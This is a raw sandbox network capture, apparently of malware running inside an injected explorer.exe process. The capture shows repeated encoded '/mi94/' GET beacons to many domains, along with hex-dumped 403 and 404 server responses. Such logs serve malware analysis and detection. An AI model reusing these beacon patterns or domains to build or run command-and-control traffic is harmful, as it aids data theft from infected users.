                                                                                            Apr 17, 2023 09:03:53.242547989 CEST343OUTGET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.herhustlenation.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 09:03:59.131853104 CEST344OUTGET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.herhustlenation.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            16192.168.11.2049880185.53.179.9080C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 09:04:06.968166113 CEST344OUTGET /mi94/?2dCtIp=8pAXjvKhwP&7n-Lh=c9XLkKzZuO0py6g1xPdswXMX5NoX1FOKmat/CxXpy/HRSPu3IeXDT300PcCDZZ6h5UkV HTTP/1.1
                                                                                            Host: www.furniture-61686.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 09:04:06.988241911 CEST344INHTTP/1.1 403 Forbidden
                                                                                            Server: nginx
                                                                                            Date: Mon, 17 Apr 2023 07:04:06 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 146
                                                                                            Connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            17192.168.11.2049882199.33.123.3480C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 09:04:44.440660954 CEST353OUTGET /mi94/?2dCtIp=8pAXjvKhwP&7n-Lh=DPf7iOV4tZbGC7wAZwygpODOxt/Orl+HPYO0G2nQwomd4kRyfSlRFlrSB1ttg/LMfS7c HTTP/1.1
                                                                                            Host: www.hunterboots--canada.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 09:04:44.858946085 CEST354INHTTP/1.1 404 Not Found
                                                                                            Date: Mon, 17 Apr 2023 07:04:44 GMT
                                                                                            Server: Apache
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                            Pragma: no-cache
                                                                                            Set-Cookie: zenid=9js4ns7i3tgo0srjnr1jmubgo2; path=/; domain=.www.hunterboots--canada.com; secure; HttpOnly
                                                                                            Upgrade: h2
                                                                                            Connection: Upgrade, close
                                                                                            Vary: Accept-Encoding
                                                                                            Transfer-Encoding: chunked
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Data Raw: 31 65 63 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 45 4a 77 49 4e 4b 39 48 47 50 37 62 72 41 6a 46 55 75 75 79 34 6c 62 6c 44 62 73 45 47 75 7a 55 47 62 63 47 6e 64 74 68 32 63 59 22 20 2f 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 3a 20 48 75 6e 74 65 72 20 42 6f 6f 74 73 20 43 61 6e 61 64 61 20 2d 20 53 68 6f 70 20 52 61 69 6e 62 6f 6f 74 73 20 57 69 74 68 20 46 72 65 65 20 53 68 69 70 70 69 6e 67 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 20 0d 0a 0d 0a 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 6d 65 6e 20 4d 65 6e 20 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 48 75 6e 74 65 72 20 42 6f 6f 74 73 20 43 61 6e 61 64 61 20 2d 20 53 68 6f 70 20 52 61 69 6e 62 6f 6f 74 73 20 57 69 74 68 20 46 72 65 65 20 53 68 69 70 70 69 6e 67 20 3a 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 57 6f 6d 65 6e 20 4d 65 6e 20 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 69 6d 61 67 65 74 6f 6f 6c 62 61 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 22 20 2f 3e 0d 0a 0d 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75
                                                                                            Data Ascii: 1ec1<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"><head> <meta name="google-site-verification" content="EJwINK9HGP7brAjFUuuy4lblDbsEGuzUGbcGndth2cY" /> <title>Page Not Found : Hunter Boots Canada - Shop Rainboots With Free Shipping</title><meta name="viewport" content="width=device-width, initial-scale=1" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="keywords" content="Women Men Page Not Found" /><meta name="description" content="Hunter Boots Canada - Shop Rainboots With Free Shipping : Page Not Found - Women Men " /><meta http-equiv="imagetoolbar" content="no" /><base href="https://www.hu
                                                                                            Apr 17, 2023 09:04:44.859044075 CEST356INData Raw: 6e 74 65 72 62 6f 6f 74 73 2d 2d 63 61 6e 61 64 61 2e 63 6f 6d 2f 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 6e 74 65 72 62 6f 6f 74 73 2d 2d 63
                                                                                            Data Ascii: nterboots--canada.com/" /><link rel="canonical" href="https://www.hunterboots--canada.com/index.php?main_page=page_not_found&amp;2dCtIp=8pAXjvKhwP&amp;7n-Lh=DPf7iOV4tZbGC7wAZwygpODOxt%2FOrl%20HPYO0G2nQwomd4kRyfSlRFlrSB1ttg%2FLMfS7c" /><s
                                                                                            Apr 17, 2023 09:04:44.859195948 CEST357INData Raw: 75 6f 6e 65 70 61 67 65 2e 63 73 73 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 69 6e 63 6c 75 64 65 73 2f 74 65 6d 70 6c 61 74 65 73 2f
                                                                                            Data Ascii: uonepage.css' /><link rel="stylesheet" type="text/css" href='/includes/templates/musheji_mobile/css/stylesheet_musheji.css' /><link rel="stylesheet" type="text/css" href='/includes/templates/musheji_mobile/css/stylesheet_musheji_menu.css' />
                                                                                            Apr 17, 2023 09:04:44.859210968 CEST358INData Raw: 63 61 72 74 5f 6f 70 61 63 69 74 79 3a 20 09 09 30 2e 39 2c 0d 0a 09 09 09 61 7a 5f 62 6f 78 5f 73 74 61 74 75 73 3a 20 09 09 09 66 61 6c 73 65 2c 0d 0a 09 09 09 61 7a 5f 74 69 6d 65 72 3a 20 09 09 09 09 22 22 2c 0d 0a 20 20 20 20 20 20 20 20 7d
                                                                                            Data Ascii: cart_opacity: 0.9,az_box_status: false,az_timer: "", }; $("#animBoxCart").html(globals.az_loading_image); $("#btn_animBoxCart").hover(function(){if(globals.az_cart_fetch == false){
                                                                                            Apr 17, 2023 09:04:44.859306097 CEST360INData Raw: 2d 61 77 65 73 6f 6d 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73
                                                                                            Data Ascii: -awesome.css" type="text/css" charset="utf-8" /><link rel="stylesheet" href="css/font-awesome.min.css" type="text/css" charset="utf-8" /> </head><body id="pagenotfoundBody">...bof-header logo and navigation displa
                                                                                            Apr 17, 2023 09:04:44.859428883 CEST361INData Raw: 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 3f 26 61 6d 70 3b 63 75 72 72 65 6e 63 79 3d 43 41 44 22 3e 43 41 44 26 6e 62 73 70 3b 28 43 41 24 29 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                            Data Ascii: <li><a href="?&amp;currency=CAD">CAD&nbsp;(CA$)</a></li> </ul> </div> </div> <div class="mu-top-box-pc"> <div class="navigation-nav"> <a r
                                                                                            Apr 17, 2023 09:04:44.859492064 CEST362INData Raw: 74 5f 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 6e 74 65 72 62 6f 6f 74 73 2d 2d 63 61 6e 61 64 61 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d 22 69 6e
                                                                                            Data Ascii: t_icon" href="https://www.hunterboots--canada.com/shopping_cart.html"><img src="includes/templates/musheji_mobile/images/spacer.gif" width="22" height="22" alt="" /> <div class="header_cart_only_number">0</div>
                                                                                            Apr 17, 2023 09:04:44.866544008 CEST363INData Raw: 31 66 66 38 0d 0a 6a 69 5f 6d 6f 62 69 6c 65 2f 69 6d 61 67 65 73 2f 73 70 61 63 65 72 2e 67 69 66 22 20 77 69 64 74 68 3d 22 32 32 22 20 68 65 69 67 68 74 3d 22 32 32 22 20 61 6c 74 3d 22 22 20 2f 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 20 20 20 20 20
                                                                                            Data Ascii: 1ff8ji_mobile/images/spacer.gif" width="22" height="22" alt="" /></a></li> <div class="clear"></div></ul></div> <div id="categoriesPopup" class="sideBoxContent popup popup-win hidden">
                                                                                            Apr 17, 2023 09:04:44.866664886 CEST364INData Raw: 73 3a 2f 2f 77 77 77 2e 68 75 6e 74 65 72 62 6f 6f 74 73 2d 2d 63 61 6e 61 64 61 2e 63 6f 6d 2f 6d 65 6e 2d 63 2d 32 33 2f 22 3e 4d 65 6e 3c 2f 61 3e 0a 20 20 20 20 3c 75 6c 3e 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74
                                                                                            Data Ascii: s://www.hunterboots--canada.com/men-c-23/">Men</a> <ul> <li><a href="https://www.hunterboots--canada.com/short-ankle-rain-boots-c-23_26/">Short & Ankle Rain Boots</a></li> <li><a href="https://www.hunterboots--canada.com/short-
                                                                                            Apr 17, 2023 09:04:44.898663998 CEST366INData Raw: 64 65 73 2f 74 65 6d 70 6c 61 74 65 73 2f 6d 75 73 68 65 6a 69 5f 6d 6f 62 69 6c 65 2f 69 6d 61 67 65 73 2f 6d 65 6e 75 2f 6e 6f 64 65 2d 6f 6e 2e 67 69 66 22 2c 22 69 6e 63 6c 75 64 65 73 2f 74 65 6d 70 6c 61 74 65 73 2f 6d 75 73 68 65 6a 69 5f
                                                                                            Data Ascii: des/templates/musheji_mobile/images/menu/node-on.gif","includes/templates/musheji_mobile/images/menu/node-open-end-on.gif","includes/templates/musheji_mobile/images/menu/node-open-end.gif","includes/templates/musheji_mobile/images/menu/node-op
                                                                                            Apr 17, 2023 09:04:45.015559912 CEST367INData Raw: 61 72 74 2d 64 72 6f 70 64 6f 77 6e 2d 77 72 61 70 70 65 72 20 70 6f 70 75 70 20 70 6f 70 75 70 2d 77 69 6e 22 3e 0d 0a 09 09 09 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 22 3e 0d 0a 09 09 09 09 09 3c 64
                                                                                            Data Ascii: art-dropdown-wrapper popup popup-win"> <div class="content-wrapper"><div><div class="cartBoxEmpty">Your cart is empty.</div></div> </div> </div></div><div class="clearBoth"></div><div class="clea


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            18192.168.11.204988323.227.38.7480C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 09:05:05.047703028 CEST384OUTGET /mi94/?7n-Lh=4Lo61ZRTO0uvURH/h1aY/xwwIPd8h5yyY/H7In0LOtAqoGXoXBtvh8DjOZnAsSvGQgKa&2dCtIp=8pAXjvKhwP HTTP/1.1
                                                                                            Host: www.textare.net
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 09:05:05.073674917 CEST385INHTTP/1.1 403 Forbidden
                                                                                            Date: Mon, 17 Apr 2023 07:05:05 GMT
                                                                                            Content-Type: text/html
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            X-Sorting-Hat-PodId: 345
                                                                                            X-Sorting-Hat-ShopId: 67998253344
                                                                                            X-Dc: gcp-europe-west3
                                                                                            X-Request-ID: 1d5660a7-c37d-450e-9f58-618507675fff
                                                                                            X-Download-Options: noopen
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            X-Permitted-Cross-Domain-Policies: none
                                                                                            X-Content-Type-Options: nosniff
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sO%2FzBjPzSilwTW%2BL8awMETuZ4eJZlqetDZOMxojQEPocv0oixU3PvyScW9f9HvCInLc4zHyem0AIM8njK4nJAVb8jRn11%2FT%2FHQphPd7gUodvgFZjNbuCgqmi5%2BkD0oNE%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                            Server-Timing: cfRequestDuration;dur=16.999960
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 7b92d14e9afbbbe5-FRA
                                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                            Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b
                                                                                            Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;
                                                                                            Apr 17, 2023 09:05:05.073756933 CEST387INData Raw: 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d
                                                                                            Data Ascii: min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;fo
                                                                                            Apr 17, 2023 09:05:05.073813915 CEST388INData Raw: 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 44 75 20 68 61 72 20 69 6b 6b 65 20 74 69 6c 6c 61 74 65 6c 73 65 20 74 69 6c 20 c3 a5 20 c3 a5 70 6e 65 20 64 65 74 74 65 20 6e 65 74 74 73 74 65 64 65 74 22 0a 20 20 7d 2c 0a 20
                                                                                            Data Ascii: "content-title": "Du har ikke tillatelse til pne dette nettstedet" }, "th": { "title": "", "content-title": "
                                                                                            Apr 17, 2023 09:05:05.073868036 CEST389INData Raw: 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 6e 20 68 61 69 20 6c e2 80 99 61 75 74 6f 72 69 7a 7a 61 7a 69 6f 6e 65 20 70 65 72 20 61 63 63 65 64 65 72 65 20 61 20 71 75 65 73 74 6f 20 73 69 74 6f 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 70 6c
                                                                                            Data Ascii: ent-title": "Non hai lautorizzazione per accedere a questo sito web" }, "pl": { "title": "Odmowa dostpu", "content-title": "Nie masz uprawnie dostpu do tej strony internetowej" }, "sv": { "title": "tkomst nekad",
                                                                                            Apr 17, 2023 09:05:05.073919058 CEST390INData Raw: 73 69 74 65 73 69 6e 65 20 65 72 69 c5 9f 69 6d 20 69 7a 6e 69 6e 69 7a 20 79 6f 6b 2e 22 0a 20 20 7d 2c 0a 20 20 22 7a 68 2d 43 4e 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 e8 ae bf e9 97 ae e8 a2 ab e6 8b 92 e7 bb 9d 22 2c 0a 20
                                                                                            Data Ascii: sitesine eriim izniniz yok." }, "zh-CN": { "title": "", "content-title": "" }, "nl": { "title": "Toegang geweigerd", "content-title": "Je hebt geen toestemming voor toegang tot d
                                                                                            Apr 17, 2023 09:05:05.073960066 CEST390INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            2192.168.11.204986015.197.142.17380C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 08:58:55.340785027 CEST288OUTGET /mi94/?7n-Lh=o1w78JSdLhQJpd//cz6vuhCEWxwCs3ZFLfqzER3yERbZr4xPYmZ3WvYQtDeAGIhYcEOX&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.canadianbreederprogram.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 08:58:55.384812117 CEST288INHTTP/1.1 403 Forbidden
                                                                                            Server: awselb/2.0
                                                                                            Date: Mon, 17 Apr 2023 06:58:55 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 118
                                                                                            Connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            3192.168.11.2049861185.53.179.9080C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 08:59:15.628216982 CEST289OUTGET /mi94/?7n-Lh=c9XLkKzZuO0py6g1xPdswXMX5NoX1FOKmat/CxXpy/HRSPu3IeXDT300PcCDZZ6h5UkV&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.furniture-61686.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 08:59:15.647727013 CEST289INHTTP/1.1 403 Forbidden
                                                                                            Server: nginx
                                                                                            Date: Mon, 17 Apr 2023 06:59:15 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 146
                                                                                            Connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            4192.168.11.204986366.29.154.11080C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 08:59:36.098406076 CEST297OUTGET /mi94/?7n-Lh=meb8sxPObMePe7P8flKxy+pWoQzvB6XBu5ErzR9pnSFmHwpkKvXtx95I7yIQNvwtHzN0&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.healthinsurancearena.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 08:59:36.271394014 CEST298INHTTP/1.1 404 Not Found
                                                                                            Date: Mon, 17 Apr 2023 06:59:36 GMT
                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                            Content-Length: 290
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 68 65 61 6c 74 68 69 6e 73 75 72 61 6e 63 65 61 72 65 6e 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.healthinsurancearena.com Port 80</address></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            5192.168.11.2049864160.121.87.19980C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 08:59:58.155635118 CEST299OUTGET /mi94/?7n-Lh=utr1Sw3RyipqcYNbY+d8Z2Tb0M8wQrjWYhfSD+Y+PBLnRGhO3V2BTvKgLoZBbtabZvWX&7nrLOp=h2JXJD HTTP/1.1
                                                                                            Host: www.anjin98.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 17, 2023 08:59:58.426502943 CEST300INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Mon, 17 Apr 2023 06:59:57 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 2253
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
